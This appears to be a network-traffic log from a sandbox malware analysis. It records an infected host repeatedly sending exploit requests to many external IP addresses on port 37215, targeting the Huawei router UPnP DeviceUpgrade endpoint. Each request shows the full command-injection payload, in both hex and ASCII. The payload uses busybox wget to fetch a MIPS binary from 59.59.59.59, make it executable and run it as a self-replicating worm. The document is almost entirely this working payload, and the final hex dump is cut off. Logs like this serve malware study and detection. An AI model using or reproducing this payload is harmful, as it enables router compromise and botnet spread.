                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          686192.168.2.153582848.56.237.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.618160009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          687192.168.2.154302298.143.32.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639010906 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          688192.168.2.1556512197.242.59.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639260054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          689192.168.2.155234641.49.186.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639309883 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          690192.168.2.155212241.143.170.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639381886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          691192.168.2.1541834197.188.28.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639437914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          692192.168.2.154477441.110.232.21937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639520884 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          693192.168.2.1545466197.64.178.10337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639544964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          694192.168.2.1535882197.222.21.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639569998 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          695192.168.2.1560366197.10.124.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639580011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 